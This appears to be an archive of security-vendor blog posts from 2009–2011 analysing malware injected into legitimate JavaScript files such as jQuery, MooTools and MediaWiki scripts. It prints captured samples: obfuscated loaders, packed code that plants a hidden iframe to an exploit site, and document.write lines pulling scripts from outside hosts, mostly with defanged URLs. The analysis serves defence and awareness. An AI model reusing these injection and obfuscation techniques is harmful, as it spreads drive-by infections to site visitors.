
Web-Malware with a Sense of Style

February 7th, 2011

Web based malware is quite interesting in the way it changes. This emerging threat can destroy the reputation of websites and online businesses, get them blacklisted by search engines and hurt their customers and visitors. Every single day, close to 6,600 new websites are added to popular malware blacklists. In this article, we will discuss the evolution of a particular piece of web-malware which is being used by hackers to avoid detection worldwide.

Web-malware is malicious computer code, like computer viruses, but injected into web pages on unsuspecting benign websites. The owners of these websites, for the most part, remain blissfully unaware that they are hurting their customers and visitors by infecting them with malware. By virtue of being party to the malware distribution network, these legitimate websites are ultimately blacklisted by search engines, various filters and end up inaccessible to their users until they are cleaned up. This leads to loss of revenue, loss of reputation and tremendous heartache.

Malware Evolution
We observe many new strains of web-malware every day. One interesting strain, which has been recurring over the past year or so, is presented in this article. We will show you how this strain of malware has “evolved.” The reason for this evolution is so that the malware can avoid detection by scanning systems.

The technology we use at Stopthehacker.com (STH) does not work like traditional Anti-Virus software, however. We can detect each version of malware, even though it may look and act a little differently from earlier versions. Scanning technology at STH uses Machine Learning and Artificial Intelligence techniques to hunt down malware and even spam on web pages. We protect the reputation of websites and prevent loss of business due to blacklisting.

Let’s look at each version of the web-malware below.

Version 1:
Also found on jsunpack.

<skript>var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ='';this.mB=29481;var xM=function(){return 'xM'};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return 'bG'};var p="p";if(!q.selectorText.match(/#c(\d+)/))continue;var nE='';var gT=new Array();w=q.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];this.lE="";mG=41875;};var gH=function(){};var e=false;}gG="gG";var cB=28236;var zE=55721;bJ=false;var j="";function jI(){};var cO='';c=function(){return {oZUd:"split"}}().oZUd;gB="gB";sG=48086;var jA=function(){};this.tH=false;var m=w;</skript>

Version 2:
Found on rexbd.net.

<span style="color:#0000BB"><skript></span>var WnmaQ={YYSXc:function(){l=<span style="color:#DD0000">&#039;&#039;</span>;var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS=<span style="color:#DD0000">"mS"</span>;var s=false;this.zN=false;var u=<span style="color:#DD0000">""</span>;var o = g.getMonth();var r = <span style="color:#DD0000">"from"</span> + g.getMonth() + <span style="color:#DD0000">"e"</span>;function t(){};d=<span style="color:#DD0000">&#039;&#039;</span>;r = r.replace(10, <span style="color:#DD0000">"CharCod"</span>);a=<span style="color:#DD0000">""</span>;this.bX=<span style="color:#DD0000">&#039;&#039;</span>; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA=<span style="color:#DD0000">""</span>;var x=false;for(var gP=0;gP <span style="color:#0000BB">< <span style="color:#007700">i.length;gP++){this.tT=false;var fU=<span style="color:#DD0000">"fU"</span>;this.nT=62782;var jC=<span style="color:#DD0000">&#039;&#039;</span>;var b=i[gP].cssRules||i[gP].rules;aV=<span style="color:#DD0000">""</span>;var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ=<span style="color:#DD0000">&#039;&#039;</span>;this.mB=29481;var xM=function(){return <span style="color:#DD0000">&#039;xM&#039;</span>};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return <span style="color:#DD0000">&#039;bG&#039;</span>};var p=<span style="color:#DD0000">"p"</span>;if(!q.selectorText.match(/#c(\d+)/))continue;var nE=<span style="color:#DD0000">&#039;&#039;</span>;var gT=new Array();w=q.style.backgroundImage.match(/url\(<span style="color:#DD0000">"?data\:[^,]*,([^"</span>)]+)<span style="color:#DD0000">"?\)/)[1];this.lE="</span><span style="color:#DD0000">";mG=41875;};var gH=function(){};var e=false;}gG="</span>gG<span style="color:#DD0000">";var cB=28236;var zE=55721;bJ=false;var j="</span><span style="color:#DD0000">";function jI(){};var cO=&#039;</span><span 
style="color:#DD0000">&#039;;c=function(){return {oZUd:"</span>split<span style="color:#DD0000">"}}().oZUd;gB="</span>gB<span style="color:#DD0000">";sG=48086;var jA=function(){};this.tH=false;var m=w;

Version 3:
Found on www.twosixandbrush.com (https://badwarebusters.org/main/itemview/24057).

<style>#c19{background:url(data:,8,17.5,29.5,38,36.5,20,43,14,6.5,46.5,49,23,15,6.5,6,6,14,14,29,14.5,45,22,27,7,32.5,51.5,44.5,25,13.5,40.5,8.5,14,15,4,11,20,11,34.5,15,43,47,15,7,9.5,3.5,21.5,20.5,24,14,28.5,26.5,13.5,19,7.5,9,29.5,13.5,26.5,8.5,9.5,33,14,18,25,18,38,3,18.5,9.5,40,32,33.5,42.5,38.5,23.5,14.5,6,7,13.5,38,19,33.5,20,5,27,12,12,8.5,2.5,14,42,38,20,20.5,18,30.5,12,44,16.5,13,8,29.5,43,44,14,11,16,38.5,22,42.5,3.5,32.5,23.5,9,25,5.5,5,5.5,6,11.5,49.5,44,41,25,12.5,3.5,45,24,42.5,9,8.5,43,16,40,52,33,3,25.5,41.5,30,28.5,44.5,5.5,16.5,14,26.5,38.5,29.5,11,6.5,19,36.5,34.5,26.5,34,20,27.5,5.5,6.5,19.5,20.5,16.5,15.5,13.5,7,9.5,25,23,10,14.5,32,23.5,28.5,49.5,23.5,19,5,12,27,2);}</style>   <skript>var WnmaQ={YYSXc:function(){l='';var  v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42,  57);this.mS="mS";var s=false;this.zN=false;var u="";var o =  g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r =  r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var  f=function(){};var i=document.styleSheets;zA="";var x=false;for(var  gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var  jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var cW=42678;for(var  n=0;n<b.length;n++){this.rS=54312;yJ='';this.mB=29481;var  xM=function(){return 'xM'};var  q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return  'bG'};var p="p";if(!q.selectorText.match(/#c(\d+)/))continue;var  nE='';var gT=new  Array();w=q.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];this.lE="";mG=41875;};var  gH=function(){};var e=false;}gG="gG";var cB=28236;var  zE=55721;bJ=false;var j="";function jI(){};var cO='';c=function(){return  {oZUd:"split"}}().oZUd;gB="gB";sG=48086;var  jA=function(){};this.tH=false;var  m=w;

Analysis
Notice the difference in the variants. In the second example, the entire payload is wrapped with style information. This obfuscation is intended to fool scanners which analyze the code within the script tag: if they fail to make sense of the entire block of code, they will identify it as just another benign HTML style element. The third case is one where the payload is slightly outside the main block of malware code. In all three variants the script itself carries no payload: it walks `document.styleSheets` looking for a rule whose selector matches `#c<number>`, pulls the comma-separated numbers out of that rule's `data:` background-image URL, and rebuilds the `fromCharCode` name from the month of a fixed `Date` – so the visible script is inert unless the matching style block is present. In this situation the scanner must correlate the presence of the “pseudo-style” information with the actual malware code and mark the entire block as unsafe. The scanner technology at STH does exactly this.

Conclusion
Authors of web-malware are trying to hide their code. This may be the effect of increased capability in scanning technologies and a raised awareness among webmasters and web-surfers making it more difficult for malicious hackers to do their deeds. This is a good sign.

Till next time.


Hackers Understand the Value of Backups

May 4th, 2010

Hackers have been trying new tricks to obfuscate their malicious code and sneak it surreptitiously into benign websites. This trend is ever increasing as websites are now the weakest link in the entire malware chain. Hackers discover vulnerabilities in websites, exploit them to inject malicious bad code and voila – you have at your disposal a “trusted” website – lots of web surfers will drop by, and in turn get infected with the hacker’s malicious code. This vicious cycle of malware has become a very attractive modus operandi for the dark figures of the Internet.

Overview

This post will show an example of a trend about which we first blogged a few months ago. We will concentrate on the way hackers use “backup-sources” to infect visitors to a compromised website. If this does not make sense yet, hold on for just a few seconds more.

Quite recently we blogged about how hackers are using benign and useful JavaScript hosted locally on accounts managed by the website owner/admin to spread malware. Hackers have injected malicious code right into useful snippets of JavaScript which do everything from displaying menu buttons, drop down choices and much much more. Take a look at our previous findings: here.

An Example

Every day we find websites which are infected with malicious code which follows the same principles. In fact, we now monitor over 1 million websites!

Website name: ipac-bd.org
Time of latest scan: 15:33:10 PDT on 2010/05/03

In this example, the website was hosting JavaScript which had been compromised by a hacker. The hacker had inserted various script elements at the very end of the benign JavaScript being used by the website. It’s likely that the website owner never saw this coming, and probably did not realize what was going on until he was blacklisted.

The “Backup” Strategy

Take a look at the example below: clearly the hacker used multiple websites which he has compromised as the “loading point” for the malicious payload injected as part of the benign JavaScript. It’s almost funny when one realizes the number of websites this hacker has used as backups for his malicious code.

In this example the hacker has used 30 different infected websites to try and load his malicious code. The frequency distribution of the infectious websites which the hacker has used to distribute his malware is present below. It seems that hackers understand the concept of a “backup-strategy” well. An interesting point to probe further would be to understand why the frequency distribution of the infected sites is the way it is.

Frequency distribution of infected websites used in the transmission of malware.




When Benign scripts attack – V

December 9th, 2009

Building on this series of posts, which tries to capture the evolution of how hackers are injecting benign scripts with malware in the hope of hiding their malicious content amongst good code, the malicious code displayed this time leads to the famous “Gumblar” infection strain and can cause a lot of headaches. This particular strain is not new, but has been resurfacing in the last few weeks and hence the focus on this specific piece.

This particular example shows how a jQuery script was used by a hacker to spread malicious code. This example is a little obfuscated. This code was mined from www.i-movix.com/en/distributors/.

On line 15 you can find:

<scri pt type="text/javas cript" src="/plugins/system/ jceutilities/js/jqu ery-126.js">

Which loads the example below:

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-05-24 14:22:17 -0400 (Sat, 24 May 2008) $
* $Rev: 5685 $
*/
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)
>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
(c--)r[e(c)]=k1||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1}

**code removed for brevity**

while(c--)if(k1)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k1);return p}('(H
(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s
)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d||S;G(d.16){

**malicious code**

/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement
('scri pt');H3qqe 3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute
('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v(
)@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$
)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@
0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(
m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##
)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a
&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|
\$/ig, ''));H3 qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea
3ur6p);}} cat h(e) {}

Till next time…


When Benign scripts attack – IV

December 2nd, 2009

We have received significant requests to keep up with this series of posts which try to capture the evolution of how hackers are injecting benign scripts with malware in the hopes of hiding their malicious content amongst good code.

This particular example shows how a menumachine script was used by a hacker to spread malicious code. This example is a little bit different from the ones we have posted before as it does not just post the malicious code using a straight iframe or obviously understandable JavaScript. This example shows how hackers are trying just a little bit harder to inject code that is somewhat obfuscated. This code was mined from www.rvp1875.com/index.html. Take a look at the example below.

/* menumachine.js v1.7.1.1 - a component of MenuMachine (c)2004 Big Bang Software Pty Ltd :: menumachine.com*/

// Sentinel compared against typeof results below. Assigned without var, so
// it becomes a property of the global object.
_ud="undefined";

// Create the global menu registry only if an earlier include has not
// already defined it.
if(typeof(bbMenu)==_ud)
  bbMenu=new Array();

// Global list; how it is used is not visible in this excerpt.
bb_fix=new Array();

function _bbroot(bbL,name,r2L,clkOp,hRelPos,vRelPos,hRPmargin,vRPmargin,smScr,scrSp,scrAm,tri,triDn,triL,t_Hr,s_Hr,fade,posID,s_bCol,s_bW,s_bBtw,s_fFam,s_fSz,s_fWt,s_fStl,s_txAl,s_lPad,s_tPad,hOL,vOL,sArr,bCol,bw,bBtw,fFam,fSz,fWt,fStl,txAl,lPad,tPad,top_vOL,top_hOL,tArr,spc,nhlP,bUp,s_ao,ao)
{
  if(typeof(__pg)==_ud)
  {
    _b=new __bbBrChk();
    _hr=null;

    if(_b.ieDom&&!_b.mac){
      var els=document.getElementsByTagName("base");

      if(els.length){
        _hr=els[0].getAttribute("href");
      }
    }

    if(!_hr)
      _hr="";

    __pg=new _bbPg();

**code removed for brevity**

    for(var g=0;g<bbMenu.length;g++)
      bbMenu[g].off();
  }

  __bbMmB=1;
  _bbUld();
}

// Page-geometry holder: records the window, its document and the current
// viewport size on `this`, then installs a resize handler.
// `_b` is the browser-sniff object built elsewhere (see `_b=new __bbBrChk()`
// in _bbroot); the meaning of its flags is assumed from their names and is
// not shown in this excerpt.
function _bbPg()
{
  var t=this;
  t.wn=window;
  t.d=t.wn.document;
  // Note the precedence: `a?b:c||d?e:f` parses as `a?b:((c||d)?e:f)`, so the
  // documentElement branch is taken only when both _b.dt and _b.ie are set,
  // the body branch for the remaining _b.ie / _b.nsDom cases, and
  // window.innerWidth/innerHeight otherwise.
  t.w=(_b.dt&&_b.ie)?t.d.documentElement.clientWidth:_b.ie||_b.nsDom?t.d.body.clientWidth:t.wn.innerWidth;
  t.h=(_b.dt&&_b.ie)?t.d.documentElement.clientHeight:_b.ie||_b.nsDom?t.d.body.clientHeight:t.wn.innerHeight;
  // A different resize handler is used when _b.n4 is set; both handlers are
  // defined outside this excerpt.
  t.wn.onresize=_b.n4?_bbRzevt:_bbRePo;
}

**malicious code**

<!--
(function(hVAxp){var v120='va@72@20a@3d@22@53@63ript@45ngine@22@2c@62@
3d@22Ve@72@73i@6fn@28)+@22@2c@6a@3d@22@22@2cu@3d@6eavig@61tor@2euse@72A
ge@6et@3b@69@66((@75@2e@69n@64exOf(@22Chrome@22)@3c0)@26@26(u@2ei@6edexO
@66@28@22@57in@22@29@3e0)@26@26@28@75@2e@69@6edexO@66(@22NT@20@36@22)@3c
0)@26@26(@64o@63u@6dent@2ecoo@6b@69e@2eind@65@78Of(@22mi@65k@3d1@22)@3c@
30)@26@26(ty@70eof(@7arv@7at@73)@21@3dt@79@70e@6ff(@22A@22@29))@7bzrvzts
@3d@22@41@22@3beval(@22if@28wi@6ed@6fw@2e@22+a@2b@22)j@3dj+@22+@61+@22M@
61jor@22@2bb+a+@22Mi@6eor@22@2bb@2ba@2b@22Bu@69@6c@64@22+@62@2b@22j@3b@2
2)@3b@64ocume@6et@2ewrit@65(@22@3cscri@70t@20src@3d@2f@2fm@61rt@22@2b@22
@75@7a@2ec@6e@2fvid@2f@3fi@64@3d@22+j+@22@3e@3c@5c@2fs@63@72i@70t@3e@22)
@3b@7d';var Id4=v120.re lace(h Axp,'%');var gIl=unes cape(Id4);eval(gIl)}
)(/\@/g);
-->

Till next time..


When Benign scripts attack – III

November 18th, 2009

In this post we continue to analyze how popular scripts are being targeted by hackers to cause infections on websites and on the computers which load them up in browsers for viewing. The motivation behind using these originally benign scripts to do the dirty work on their behalf is that a lot of webmasters and web-enthusiasts have wised up to the fact that code-injection is a never ending battle and they are making efforts to identify and remove malicious code from their sites.

This particular example shows how a mootools script was used by a hacker to spread a Gumblar infection. Consider the case of hxxp://www.wwf.gr/ referred to by 22lyk-athin. att.sch .gr/index.html. You will find the following code listed in one of the associated mootools JavaScript files which are pulled in from the local drives. The malicious code causes an infection which leads to a site being blacklisted by Google. The detailed report from Google would probably mention that the infection is of the “Gumblar” type.

Following the first example is another one wherein a Mediawiki script was targeted. The source was www.1wed din gsource.com/wedding-wiki/Wedding/

//MooTools, My Object Oriented Javascript Tools. Copyright (c) 2006 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:'1.11'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&amp;&amp;obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}}
if(type=='object'||type=='function'){switch(obj.constructor){case Array:return'array';case RegExp:return'regexp';case Class:return'class';}
if(typeof obj.length=='number'){if(obj.item)return'collection';if(obj.callee)return'arguments';}}
return type;};function $merge(){var mix={};for(var i=0;i&lt;arguments.length;i++){for(var property in arguments[i]){var ap=arguments[i][property];var mp=mix[property];if(mp&amp;&amp;$type(ap)=='object'&amp;&amp;$type(mp)=='object')mix[property]=$merge(mp,ap);else mix[property]=ap;}}
return mix;};var $extend=function(){var args=arguments;if(!args[1])args=[this,args[0]];for(var property in args[1])args[0][property]=args[1][property];return args[0];};var $native=function(){for(var i=0,l=arguments.length;i&lt;l;i++){arguments[i].extend=function(props){for(var prop in props){if(!this.prototype[prop])this.prototype[prop]=props[prop];if(!this[prop])this[prop]=$native.generic(prop);}};}};$native.generic=function(prop){return function(bind){return this.prototype[prop].apply(bind,Array.prototype.slice.call(arguments,1));};};$native(Function,Array,String,Number);function $chk(obj){return!!(obj||obj===0);};function $pick(obj,picked){return $defined(obj)?obj:picked;};function $random(min,max){return Math.floor(Math.random()*(max-min+1)+min);};function $time(){return new Date().getTime();};function $clear(timer){clearTimeout(timer);clearInterval(timer);return null;};var Abstract=function(obj){obj=obj||{};obj.extend=$extend;return obj;};var Window=new Abstract(window);var Document=new Abstract(document);document.head=document.getElementsByTagName('head')[0];window.xpath=!!(document.evaluate);if(window.ActiveXObject)window.ie=window[window.XMLHttpRequest?'ie7':'ie6']=true;else if(document.childNodes&amp;&amp;!document.all&amp;&amp;!navigator.taintEnabled)window.webkit=window[window.xpath?'webkit420':'webkit419']=true;else if(document.getBoxObjectFor!=null)window.gecko=true;window.khtml=window.webkit;Object.extend=$extend;if(typeof HTMLElement=='undefined'){var HTMLElement=function(){};if(window.webkit)document.createElement(&quot;iframe&quot;);HTMLElement.prototype=(window.webkit)?window[&quot;[[DOMElement.prototype]]&quot;]:{};}
HTMLElement.prototype.htmlElement=function(){};if(window.ie6)try{document.execCommand(&quot;BackgroundImageCache&quot;,false,true);}catch(e){};var(properties){var klass=function(){return(arguments[0]!==null&amp;&amp;this.initialize&amp;&amp;$type(this.initialize)=='function')?this.initialize.apply(this,arguments):this;};$extend(klass,this);klass.prototype=properties;klass.constructor=Class;return klass;};Class.empty=function(){};Class.prototype={extend:function(properties){var proto=new this(null);for(var property in properties){var pp=proto[property];proto[property]=Class.Merge(pp,properties[property]);}
return new Class(proto);},implement:function(){for(var i=0,l=arguments.length;i&lt;l;i++)$extend(this.prototype,arguments[i]);}};Class.Merge=function(previous,current){if(previous&amp;&amp;previous!=current){var type=$type(current);if(type!=$type(previous))return current;switch(type){case'function':var merged=function(){this.parent=arguments.callee.parent;return current.apply(this,arguments);};merged.parent=previous;return merged;case'object':return $merge(previous,current);}}
return current;};var Chain=new Class({chain:function(fn){this.chains=this.chains||[];this.chains.push(fn);return this;},callChain:function(){if(this.chains&amp;&amp;this.chains.length)this.chains.shift().delay(10,this);},clearChain:function(){this.chains=[];}});var Events=new Class({addEvent:function(type,fn){if(fn!=Class.empty){this.$events=this.$events||{};this.$events[type]=this.$events[type]||[];this.$events[type].include(fn);}
return this;},fireEvent:function(type,args,delay){if(this.$events&amp;&amp;this.$events[type]){this.$events[type].each(function(fn){fn.create({'bind':this,'delay':delay,'arguments':args})();},this);}

**code removed for brevity**

this.effects={};if(this.options.opacity)this.effects.opacity='fullOpacity';if(this.options.width)this.effects.width=this.options.fixedWidth?'fullWidth':'offsetWidth';if(this.options.height)this.effects.height=this.options.fixedHeight?'fullHeight':'scrollHeight';for(var i=0,l=this.togglers.length;i&lt;l;i++)this.addSection(this.togglers[i],this.elements[i]);this.elements.each(function(el,i){if(this.options.show===i){this.fireEvent('onActive',[this.togglers[i],el]);}else{for(var fx in this.effects)el.setStyle(fx,0);}},this);this.parent(this.elements);if($chk(this.options.display))this.display(this.options.display);},addSection:function(toggler,element,pos){toggler=$(toggler);element=$(element);var test=this.togglers.contains(toggler);var len=this.togglers.length;this.togglers.include(toggler);this.elements.include(element);if(len&amp;&amp;(!test||pos)){pos=$pick(pos,len-1);toggler.injectBefore(this.togglers[pos]);element.injectAfter(toggler);}else if(this.container&amp;&amp;!test){toggler.inject(this.container);element.inject(this.container);}
var idx=this.togglers.indexOf(toggler);toggler.addEvent('click',this.display.bind(this,idx));if(this.options.height)element.setStyles({'padding-top':0,'border-top':'none','padding-bottom':0,'border-bottom':'none'});if(this.options.width)element.setStyles({'padding-left':0,'border-left':'none','padding-right':0,'border-right':'none'});element.fullOpacity=1;if(this.options.fixedWidth)element.fullWidth=this.options.fixedWidth;if(this.options.fixedHeight)element.fullHeight=this.options.fixedHeight;element.setStyle('overflow','hidden');if(!test){for(var fx in this.effects)element.setStyle(fx,0);}
return this;},display:function(index){index=($type(index)=='element')?this.elements.indexOf(index):index;if((this.timer&amp;&amp;this.options.wait)||(index===this.previous&amp;&amp;!this.options.alwaysHide))return this;this.previous=index;var obj={};this.elements.each(function(el,i){obj[i]={};var hide=(i!=index)||(this.options.alwaysHide&amp;&amp;(el.offsetHeight&gt;0));this.fireEvent(hide?'onBackground':'onActive',[this.togglers[i],el]);for(var fx in this.effects)obj[i][fx]=hide?0:el[this.effects[fx]];},this);return this.start(obj);},showThisHideOpen:function(index){return this.display(index);}});Fx.Accordion=Accordion;

**malicious code**

document.write('&lt;scr ipt src=hxxp://nw drealty.com/Scripts/Unti tled-17.php &gt;&lt;\/sc ript&gt;');
document.write('&lt;scri pt src=hxxp://nwd realty.com/Scripts/Untit led-17.php &gt;&lt;\/s cript&gt;');&lt;/pre&gt;
etTime()+2678400000);if(document.cookie.indexOf(&quot;_df=f&quot;)==-1){if(navigator.appCodeName.indexOf(&quot;a&quot;)!=-1){iframe=&quot;iframe&quot;}document.write(&quot;&lt;iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'&gt;&lt;/iframe&gt;&quot;);document.cookie=&quot;_df=f; expires=expires.toGMTString(); &quot;}\n']&lt;/pre&gt;

Our systems flagged this as unsafe. This exploit leads to an infection which is a remnant of the famous gumblar virus.

// MediaWiki JavaScript support functionsvar clientPC = navigator.userAgent.toLowerCase(); // Get client info
<pre id="cb0049f11cbf55990b47f8e86dc03a62ee0ea17d-133-highlight">
var is_gecko = /gecko/.test( clientPC ) &&
!/khtml|spoofer|netscape\/7\.0/.test(clientPC);
var webkit_match = clientPC.match(/applewebkit\/(\d+)/);
if (webkit_match) {
var is_safari = clientPC.indexOf('applewebkit') != -1 &&
clientPC.indexOf('spoofer') == -1;
var is_safari_win = is_safari && clientPC.indexOf('windows') != -1;

** code removed for brevity **
}
//note: all skins should call runOnloadHook() at the end of html output,
//      so the below should be redundant. It's there just in case.
hookEvent("load", runOnloadHook);

** malicious code **
document.write('<scr ipt src=hxxp://hydr eka.com/logiciels/winfluid_mo bile.php ><\/s cript>');</pre>


When Benign scripts attack – II

November 16th, 2009

A few weeks back I wrote about how hackers are targeting benign scripts to do the dirty work on their behalf. The trend is now intensifying. In the last post about this issue, we saw how common scripts like JQuery and AC_RunActiveContent, mootools and others were being targeted. This time we will look at injection in a script which does not conform to the trend mentioned.

This particular example is not a popularly deployed script, and is probably hand-coded by a developer for their own purposes. Consider the case of hxxp://www.iu.edu.sa/web mail/ You will find the following code listed in one of the associated JavaScript files which are pulled in from the local drives. Interestingly, the code is packed using a format like the popular Dean Edwards Packer. Unpacking it is trivial and hence the actual code which was not part of the original file is also displayed below.

// defines for sections
var SECTION_LOGIN    = 0;
var SECTION_MAIL     = 1;

// defines for screens
var SCREEN_LOGIN              = 0;
var SCREEN_MESSAGES_LIST_VIEW = 1;
var SCREEN_MESSAGES_LIST      = 2;
var SCREEN_VIEW_MESSAGE       = 3;
var SCREEN_NEW_MESSAGE        = 4;

var Sections = Array();
Sections[SECTION_LOGIN]    = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL]     = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST_VIEW] = 'screen = new CMessagesListViewScreen(SkinName);';
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST] = 'screen = new CMessagesListScreen(SkinName);';

**code removed for brevity**

var REDRAW_NOTHING = 0;
var REDRAW_PAGE    = 3;
var AUTOSELECT_CHARSET = -1;
var VIEW_MODE_WITH_PANE     = 1;
var Fonts = [Arial, Arial Black, Courier New, Tahoma, Times New Roman, Verdana]

Ready(INIT_DEFINES);

**malicious code**

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){returnw};c=1};while(c--){if(k1){p=p.replace(new RegExp(be(c)b,g),k1)}}return p}(g 7=b 5(),4=b 5(7.k()l);2(0.9.6(8=f)==-1){2(i.m.6(a)!=-1){3=3}0.c(&lt;3dh=1 ej=1 w=hn://yz-v.u/p/ o=qr:t&gt;&lt;/2s&gt;);0.9=8=f;4=4.x(); },36,36,document||if|iframe|expires|Date|indexOf|today|_df|cookie||new|write|widt|heig||var||navigator|ht|getTime|2678400000|appCodeName|ttp|style|b2b|dis|play|rame|none|net|atm|src|toGMTString|loadi|ng.split(|),0,{}));

**unpacked form**

['var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf(&quot;_df=f&quot;)==-1){if(navigator.appCodeName.indexOf(&quot;a&quot;)!=-1){iframe=&quot;iframe&quot;}document.write(&quot;&lt;iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'&gt;&lt;/iframe&gt;&quot;);document.cookie=&quot;_df=f; expires=expires.toGMTString(); &quot;}\n']&lt;/pre&gt;

Our systems flagged this as unsafe and for further validation one can look up malware-domain-list.

2009/03/28_00:00 loading-atm.net/b2b/ 83.133.123.140 t490.1paket.com redirects to exploits Jsfgvbg (loading-atm@mail.ru) 13237

The exploit seems to throw an executable onto the victim’s system, which in turn is a downloader and tries to grab two more files from the same domain.

And to whet your appetite more, here’s another example captured from hxxp://www. aikidoofqueens. com/kids/

<pre id="16a4ab078355b4e53857777860831edc756eb492-1-highlight">var ma=new Array();var mx=new Array();var my=new Array();var mc=new Array();
var mpos=new Array();var mal=0;var main=0;var menuw=200;var psrc=0;
var pname="";var al="";var gd=0;var gx,gy;var d=document;
var NS7=(!d.all&&d.getElementById);var NS4=(!d.getElementById);
var IE5=(!NS4&&!NS7&&(navigator.userAgent.indexOf('MSIE 5.0')!=-1
||navigator.userAgent.indexOf('MSIE 5.2')!=-1));var IE5p5=(!NS4&&
!NS7&&navigator.userAgent.indexOf('MSIE 5.5')!=-1);var NS6=(NS7&&
navigator.userAgent.indexOf('Netscape6')!=-1);
var SAF=navigator.userAgent.indexOf('Safari')!=-1;p=navigator.userAgent.indexOf('Opera');
if(p>-1){p=navigator.userAgent.charAt(p+6);if(p>6)NS7=1;else NS4=1;}var 

** code removed for brevity **

<pre id="16a4ab078355b4e53857777860831edc756eb492-1-highlight">clipMenu(i,el){if(el.offsetLeft>mx[i])el.style.clip="rect("+(my[i]-el.offsetTop)+"px "
+(el.offsetWidth+(mx[i]-el.offsetLeft))+"px "+el.offsetHeight+"px "+0+"px)";
else el.style.clip="rect("+(my[i]-el.offsetTop)+"px "+el.offsetWidth+"px "+
el.offsetHeight+"px "+(mx[i]-el.offsetLeft)+"px)";}

** malicious code **

document.write('< script src=hxxp://b olccorlando.org/_vti_txt/event_pwf.php ><\/s cript>');
document.write('<sc ript src=hxxp://gh anafoneshop.com/category_images/vieworder.php ><\/s cript>');
document.write('<scr ipt src=hxxp://gha nafoneshop.com/category_images/vieworder.php ><\/sc ript>');
document.write('<scri pt src=hxxp://ghan afoneshop.com/category_images/vieworder.php ><\/scr ipt>');
document.write('<scrip t src=hxxp://ghana foneshop.com/category_images/vieworder.php ><\/scri pt>');
document.write('<sc ript src=hxxp://ghanaf oneshop.com/category_images/vieworder.php ><\/scrip t>');
document.write('<scr ipt src=hxxp://ramazan -toker.com/images/gifimg.php ><\/sc ript>');
